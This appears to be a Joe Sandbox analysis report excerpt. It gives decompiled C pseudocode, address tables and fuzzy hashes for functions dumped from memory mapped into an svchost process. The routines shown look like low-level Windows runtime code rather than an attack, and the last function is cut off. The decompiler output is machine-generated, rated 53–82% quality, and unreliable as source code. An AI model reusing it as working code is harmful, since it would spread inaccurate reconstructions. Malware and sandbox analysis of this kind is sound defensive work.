                        0x0302917f
                        0x03029182
                        0x03029182
                        0x03029187
                        0x03029187
                        0x0302918a
                        0x0302918d
                        0x0302918f
                        0x03029192
                        0x03029195
                        0x03029198
                        0x03029198
                        0x03029198
                        0x0302919a
                        0x00000000
                        0x00000000
                        0x0308371f
                        0x03083721
                        0x03083727
                        0x0308372f
                        0x03083733
                        0x03083735
                        0x03083738
                        0x0308373b
                        0x0308373d
                        0x03083740
                        0x00000000
                        0x00000000
                        0x03083746
                        0x03083749
                        0x00000000
                        0x00000000
                        0x0308374f
                        0x03083751
                        0x00000000
                        0x00000000
                        0x03083757
                        0x03083759
                        0x0308375c
                        0x0308375c
                        0x0308375e
                        0x0308375e
                        0x03083761
                        0x03083764
                        0x00000000
                        0x00000000
                        0x03083766
                        0x03083768
                        0x030837a3
                        0x030837a3
                        0x030837a5
                        0x030837a7
                        0x030837ad
                        0x030837b0
                        0x030837b2
                        0x030837bc
                        0x030837c2
                        0x030837c2
                        0x030837b2
                        0x03029187
                        0x03029187
                        0x0302918a
                        0x0302918d
                        0x0302918f
                        0x03029192
                        0x03029195
                        0x00000000
                        0x03029195
                        0x00000000
                        0x03029187
                        0x0308376a
                        0x0308376a
                        0x0308376c
                        0x0308376c
                        0x0308376f
                        0x03083775
                        0x00000000
                        0x00000000
                        0x03083777
                        0x03083779
                        0x00000000
                        0x00000000
                        0x03083782
                        0x03083787
                        0x03083789
                        0x03083790
                        0x03083790
                        0x0308378b
                        0x0308378b
                        0x0308378b
                        0x03083792
                        0x03083795
                        0x03083795
                        0x03083798
                        0x03083798
                        0x0308379b
                        0x0308379b
                        0x030291a3
                        0x030291a9
                        0x030291b0
                        0x030291b4
                        0x030291b4
                        0x030291bb
                        0x030291c0
                        0x030291c5
                        0x030291c7
                        0x030837da
                        0x030291cd
                        0x030291cd
                        0x030291cd
                        0x030291d2
                        0x030291d5
                        0x03029239
                        0x03029239
                        0x030291d7
                        0x030291db
                        0x030291e1
                        0x030291e7
                        0x030291fd
                        0x03029203
                        0x0302921e
                        0x03029223
                        0x00000000
                        0x03029223
                        0x03029205
                        0x03029208
                        0x0302920c
                        0x03029214
                        0x03029214
                        0x030291e9
                        0x030291e9
                        0x030291ee
                        0x030291f3
                        0x030291f3
                        0x030291f3
                        0x030291e7
                        0x00000000
                        0x030291db
                        0x03029187
                        0x03029168

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e65d5838e4b00ac1f4d3686dc68b5d2f2135887a4132e65905dc651f06be8652
                        • Instruction ID: 0467c82a4c672a4dd615ae277dae3593b7d972054987ab3ff5e367e917936cbc
                        • Opcode Fuzzy Hash: e65d5838e4b00ac1f4d3686dc68b5d2f2135887a4132e65905dc651f06be8652
                        • Instruction Fuzzy Hash: 2531BC79A03399DFDB65EB6DC588BEDBBF1BB88310F188599C4046B241C334A990CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03051DB5 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E03051DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0304F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03044620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0304F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                        0x03051dc2
                        0x03051dc5
                        0x03051dc7
                        0x03051dcc
                        0x03051dce
                        0x03051dd6
                        0x03051ddf
                        0x03051de0
                        0x03051de1
                        0x03051de5
                        0x03051de8
                        0x03051def
                        0x03051df0
                        0x03051df6
                        0x03051df7
                        0x03051dfe
                        0x03051e1a
                        0x00000000
                        0x00000000
                        0x03051e0b
                        0x03051e12
                        0x03051e12
                        0x03051e00
                        0x03051e00
                        0x03051e05
                        0x03051e1e
                        0x03051e23
                        0x0309570f
                        0x03095713
                        0x00000000
                        0x00000000
                        0x03095719
                        0x03095719
                        0x03051e2c
                        0x03051e2d
                        0x03051e2e
                        0x03051e2f
                        0x03051e31
                        0x03051e32
                        0x03051e35
                        0x03051e3d
                        0x03095723
                        0x0309573d
                        0x0309573d
                        0x00000000
                        0x03095723
                        0x03051e49
                        0x03051e4e
                        0x03051e4e
                        0x03051e09
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: d196402b5a7655c51e3d951e504c10c142866c9173b52aff5a8e1fff4ea47896
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 6B219F76642219FBDB25CF59CC84FABFBBDEF89640F154065F9019B210D674AE01C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03040050 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E03040050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x311d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03059ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0306B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E030F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03059702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x311b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                        0x03040055
                        0x0304005d
                        0x03040062
                        0x0304006c
                        0x0304006f
                        0x03040074
                        0x0304007a
                        0x0304007a
                        0x03040080
                        0x03040080
                        0x03040087
                        0x0304008d
                        0x0304008f
                        0x03040093
                        0x03040095
                        0x0304009b
                        0x030400f8
                        0x030400fb
                        0x030400fc
                        0x030400ff
                        0x03040108
                        0x03040108
                        0x030400a2
                        0x030400a6
                        0x030400b3
                        0x030400bc
                        0x030400c5
                        0x030400ca
                        0x0308c01e
                        0x00000000
                        0x00000000
                        0x0308c02d
                        0x030400d5
                        0x030400d9
                        0x0308c03d
                        0x0308c046
                        0x0308c046
                        0x030400df
                        0x030400e2
                        0x030400ea
                        0x030400ef
                        0x030400f2
                        0x030400f6
                        0x03040111
                        0x03040117
                        0x03040117
                        0x00000000
                        0x030400f6
                        0x030400d0
                        0x030400d0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc3504647dc016341d3be8cb877d22a838f7b3ba2c930cd590f67e06c7a85f9a
                        • Instruction ID: 7d67134329523cc1333f1e881aa8180c76a5d49625ad2d55a853d6b89df65aa9
                        • Opcode Fuzzy Hash: bc3504647dc016341d3be8cb877d22a838f7b3ba2c930cd590f67e06c7a85f9a
                        • Instruction Fuzzy Hash: 1C31BF71202B04CFD765DF28C840B9AF3E5FF88714F18856DE59697B50EB75A901CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A6C0A Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E030A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03047D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3117b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03044620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0306F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03047D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03069AE0();
						_t23 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                        0x030a6c0a
                        0x030a6c0f
                        0x030a6c10
                        0x030a6c13
                        0x030a6c15
                        0x030a6c19
                        0x030a6c1c
                        0x030a6c21
                        0x030a6c28
                        0x030a6c3a
                        0x030a6c2a
                        0x030a6c33
                        0x030a6c33
                        0x030a6c3f
                        0x030a6c48
                        0x030a6c4d
                        0x030a6c60
                        0x030a6c65
                        0x030a6c69
                        0x030a6c73
                        0x030a6c79
                        0x030a6c7f
                        0x030a6c86
                        0x030a6c90
                        0x030a6c94
                        0x030a6ca6
                        0x030a6cb2
                        0x030a6cbd
                        0x030a6cbd
                        0x030a6cc3
                        0x030a6cc7
                        0x030a6ccb
                        0x030a6cd0
                        0x030a6cd1
                        0x030a6ce2
                        0x030a6ce2
                        0x030a6c69
                        0x030a6ced

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a303ab308569d55a4fb53c3205d01b77761163489798764b9f7dbb88a76bb225
                        • Instruction ID: 3ca19e4b1b85843170bc9bbd571248fea1636bab4decc9c17f75d6fdf5d0ea5f
                        • Opcode Fuzzy Hash: a303ab308569d55a4fb53c3205d01b77761163489798764b9f7dbb88a76bb225
                        • Instruction Fuzzy Hash: 1F219CB5601A44ABC715DFA8D940E6AB7B8FF48700F084069F904CB790D735E910CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030690AF Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E030690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0307D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0305E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03044620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0306F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0305A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                        0x030690af
                        0x030690b8
                        0x030690bb
                        0x030690bf
                        0x030690c2
                        0x030690c2
                        0x030690c8
                        0x030690cb
                        0x030690cd
                        0x030a14d7
                        0x030a14eb
                        0x030a14eb
                        0x00000000
                        0x030a14eb
                        0x030a14db
                        0x030a14e6
                        0x00000000
                        0x030a14f2
                        0x030a14e8
                        0x00000000
                        0x030a14e8
                        0x030690d8
                        0x030690da
                        0x030690dd
                        0x030690e5
                        0x00000000
                        0x03069139
                        0x030690fa
                        0x030690fe
                        0x03069142
                        0x00000000
                        0x03069142
                        0x03069104
                        0x03069107
                        0x0306910b
                        0x03069110
                        0x03069118
                        0x03069147
                        0x03069148
                        0x0306914f
                        0x03069150
                        0x03069151
                        0x03069152
                        0x03069156
                        0x0306915d
                        0x03069160
                        0x03069168
                        0x0306916c
                        0x030691bc
                        0x030691be
                        0x00000000
                        0x030691be
                        0x0306916e
                        0x03069173
                        0x03069176
                        0x00000000
                        0x00000000
                        0x0306917c
                        0x03069180
                        0x030691b5
                        0x00000000
                        0x030691b5
                        0x03069182
                        0x03069185
                        0x03069189
                        0x00000000
                        0x00000000
                        0x0306918e
                        0x03069190
                        0x03069198
                        0x00000000
                        0x00000000
                        0x030691a0
                        0x00000000
                        0x030691ad
                        0x030691ad
                        0x030691b0
                        0x030691b1
                        0x00000000
                        0x03069185
                        0x0306911a
                        0x0306911c
                        0x0306911f
                        0x03069125
                        0x03069127
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 3e3b454d61be109499c40261d3212f186521ebbd3e800290e20894deb74b218c
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: A6218E75A02704EFDB20DF99D844AAAF7F8EF44710F1488AAE949AB600D330ED00CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03053B7A Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E03053B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x31184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x31184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x31184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0306AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0306FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x31184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x31184c4; // 0x0
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                        0x03053b89
                        0x03053b96
                        0x03053ba1
                        0x03053bab
                        0x03053bb5
                        0x03053bb9
                        0x03096298
                        0x03053bbf
                        0x03053bc2
                        0x03053bc3
                        0x03053bc9
                        0x03053bca
                        0x03053bcc
                        0x03053bcd
                        0x03053bd4
                        0x03053bd6
                        0x03053bdb
                        0x03053bea
                        0x03053bf7
                        0x03053bfb
                        0x03053bff
                        0x03053c09
                        0x03053c0a
                        0x03053c0b
                        0x03053c0f
                        0x03053c14
                        0x03053c18
                        0x03053c18
                        0x03053bfb
                        0x03053c1b
                        0x03053c30
                        0x03053c30
                        0x03053c3d

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61291026bbdbc42574a0b74beceed439294f89f7448287df6e5e7b94481caf39
                        • Instruction ID: 07f99ae326f23897d605f37dc2a12f8da4d894858666ba33cf95553cf9b731bc
                        • Opcode Fuzzy Hash: 61291026bbdbc42574a0b74beceed439294f89f7448287df6e5e7b94481caf39
                        • Instruction Fuzzy Hash: F821A4B2A01108AFD704DF58CE81F9ABBBDFB44748F1540A9F904AB251D771ED41DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A6CF0 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E030A6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03047D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03047D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3005c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0305F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0305F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E030A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03042400( &_v52);
								}
								_t21 = L03042400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                        0x030a6cfb
                        0x030a6d00
                        0x030a6d02
                        0x030a6d06
                        0x030a6d0a
                        0x030a6d0e
                        0x030a6d19
                        0x030a6d2b
                        0x030a6d1b
                        0x030a6d24
                        0x030a6d24
                        0x030a6d33
                        0x030a6d39
                        0x030a6d46
                        0x030a6d4f
                        0x030a6d61
                        0x030a6d51
                        0x030a6d5a
                        0x030a6d5a
                        0x030a6d69
                        0x030a6d6b
                        0x030a6d6d
                        0x030a6d6f
                        0x030a6d6f
                        0x030a6d74
                        0x030a6d79
                        0x030a6d7a
                        0x030a6d7f
                        0x030a6d82
                        0x030a6d88
                        0x030a6d89
                        0x030a6d90
                        0x030a6d94
                        0x030a6da7
                        0x030a6db1
                        0x030a6db1
                        0x030a6dbb
                        0x030a6dbb
                        0x030a6d90
                        0x030a6d69
                        0x030a6d46
                        0x030a6dc6

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0783bba4284fd5d5c9d74961f7b909eba96e1af635e381a840f61570427fe018
                        • Instruction ID: a83d17a8545a1591769148c7fa1f57d4751c66b9b4fbd64486db5b54494e2ca2
                        • Opcode Fuzzy Hash: 0783bba4284fd5d5c9d74961f7b909eba96e1af635e381a840f61570427fe018
                        • Instruction Fuzzy Hash: D221D372906B499BC311DFACD944BABB7FCEFC1680F0C0966B9509B250D735C608C6A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F070D Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E030F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E030F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E030EAFDE( &_v8,  &_v12);
					E030F1293(_t38, _v28, _t60);
					if(E03047D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E030E14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                        0x030f071b
                        0x030f0724
                        0x030f0734
                        0x030f0738
                        0x030f074b
                        0x030f074b
                        0x030f0753
                        0x030f0753
                        0x030f0759
                        0x030f075d
                        0x030f0774
                        0x030f0779
                        0x030f077d
                        0x030f0789
                        0x030f0795
                        0x030f07a7
                        0x030f0797
                        0x030f07a0
                        0x030f07a0
                        0x030f07af
                        0x030f07c4
                        0x030f07cd
                        0x030f07cd
                        0x030f07af
                        0x030f07dc

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: b20e68815cdb54766bb4add0ddf3860f186054d10b2294567e8eebc87376a72e
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: F221D03A705300AFD715DF58C880AABBBE5EFC4650F088569FA958B792D630D909CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A7794 Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E030A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
